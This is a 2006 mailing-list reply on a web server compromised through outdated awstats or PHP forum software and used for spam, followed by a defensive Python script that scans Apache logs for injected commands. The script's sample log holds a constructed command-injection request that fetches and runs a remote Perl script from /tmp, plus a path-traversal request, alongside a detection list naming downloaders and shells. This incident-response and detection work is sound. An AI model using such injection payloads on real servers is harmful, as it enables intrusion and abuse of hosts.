
Re: Postfix hit again (Spam)

On Tue, 23 May 2006, Les Mikesell wrote:

> On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
> > I don't think that's what this is. Form spam takes advantage of
> > poorly-coded mail/contact forms and uses them to send mail to recipients
> > other than those intended by the form designer.
> > 
> > What's happening here is that the spammer is running their own code
> > (downloaded into /tmp) to send the mail, a rather more serious
> > situation.

An old version of awstats will get you into this club, as will some of the
php based forum programs.

All it takes is for someone to install one of these in a document root and
not keep up with the updates. It is insanely trivial to exploit one of
these boxes. It even gets logged in the http logs for all to see.
The hardest part is figuring out when it actually happened so you can find
it in the logs.

> If you have ssh access open there's a fair chance that someone
> has done a brute-force password guess.  There is a lot of
> that going around.  Or you didn't apply all of the current
> updates before exposing the system to the internet.  

I suspect if ssh had been compromised that the user would have been something
other than apache. The passwd entry for apache generally looks something like
this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh
login as apache would not be possible via brute force passwd attack vectors.


Tom Diehl		tdiehl rogueind com		Spamtrap address mtd123 rogueind com
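The two checks Tom describes, working back through the http logs to find when the box was
hit and reading the passwd entry to rule out an ssh login, as an added example. This is
not code from the thread or from any of the projects named in it. The access_log lines
below are constructed for the example (Apache combined format, RFC 5737 test addresses);
the query string in the second line is made up to look like a command that fetches and
runs a script out of /tmp and is not a claim about any particular awstats or forum parameter.
The indicator patterns are an assumption about what such requests tend to contain.

```python
#!/usr/bin/env python3
"""Triage for a web host where an unpatched CGI/PHP app was used to fetch
and run attacker code. Two checks: (1) walk the Apache access log for
requests whose query string carries shell commands, downloader or
interpreter names, /tmp, or path traversal, and report the earliest one;
(2) decide from a passwd(5) entry whether an account could have been
logged into over ssh at all."""
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Apache "combined" format; the request line is split into method and path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# (label, regex) pairs applied to the URL-decoded query string only, so a
# path like /forum/index.php does not trip the interpreter check. These are
# assumed indicators, not a signature for any specific vulnerability.
INDICATORS = [
    ("shell-metachar", re.compile(r'[|;`]|\$\(')),
    ("tmp-dir", re.compile(r'/(?:var/)?tmp\b')),
    ("downloader", re.compile(r'\b(?:wget|curl|fetch|lynx)\b')),
    ("interpreter", re.compile(r'\b(?:perl|python|bash|sh)\b')),
    ("traversal", re.compile(r'\.\./')),
]

# Shells that refuse an interactive session, so a guessed password is useless.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin",
                  "/bin/false", "/usr/bin/false"}

# Constructed sample log; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/May/2006:03:12:07 -0400] "GET /awstats/awstats.pl?config=localhost HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [21/May/2006:03:12:44 -0400] "GET /awstats/awstats.pl?config=%7Cecho%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.pl%3Bperl%20x.pl%3Becho%7C HTTP/1.1" 200 1203 "-" "Mozilla/4.0"
192.0.2.44 - - [22/May/2006:09:01:15 -0400] "GET /forum/index.php?act=Login HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
192.0.2.44 - - [22/May/2006:09:02:03 -0400] "POST /forum/index.php HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
198.51.100.9 - - [23/May/2006:01:47:22 -0400] "GET /forum/index.php?page=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "libwww-perl/5.805"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Split on the raw '?' before decoding so an encoded '?' in the query
    # cannot move the boundary.
    rec["path"], _, query = rec["path"].partition("?")
    rec["query"] = unquote_plus(query)
    return rec


def suspicious_indicators(query):
    """Labels of every indicator that matches the decoded query string."""
    return [label for label, rx in INDICATORS if rx.search(query)]


def scan(log_text):
    """All requests carrying at least one indicator, oldest first."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        hits = suspicious_indicators(rec["query"])
        if hits:
            findings.append({"time": rec["time"], "ip": rec["ip"],
                             "path": rec["path"], "query": rec["query"],
                             "status": rec["status"], "indicators": hits})
    findings.sort(key=lambda f: f["time"])
    return findings


def earliest(findings):
    """Timestamp of the first suspicious request: the 'when' to start from."""
    return findings[0]["time"] if findings else None


def interactive_login_possible(passwd_entry):
    """True if the 7-field passwd line gives the account a real shell, i.e.
    a brute-forced password could yield an ssh session."""
    fields = passwd_entry.strip().split(":")
    if len(fields) != 7:
        raise ValueError("not a passwd(5) entry")
    shell = fields[6] or "/bin/sh"  # an empty shell field means /bin/sh
    return shell not in NOLOGIN_SHELLS


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f["time"].isoformat(), f["ip"], f["status"], f["path"],
              "?" + f["query"], ",".join(f["indicators"]))
    print("earliest suspicious request:", earliest(hits))
    print("apache can log in via ssh:",
          interactive_login_possible("apache:x:48:48:Apache:/var/www:/sbin/nologin"))
```

Run it against a real access_log with `scan(open("/var/log/httpd/access_log").read())`
and work forward from the earliest hit; anything in /tmp with an mtime near that
timestamp is where to look next. The indicator list is deliberately loose (it will
flag legitimate requests that happen to contain "../" or a semicolon), since for
this job a short list to eyeball beats a missed request.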
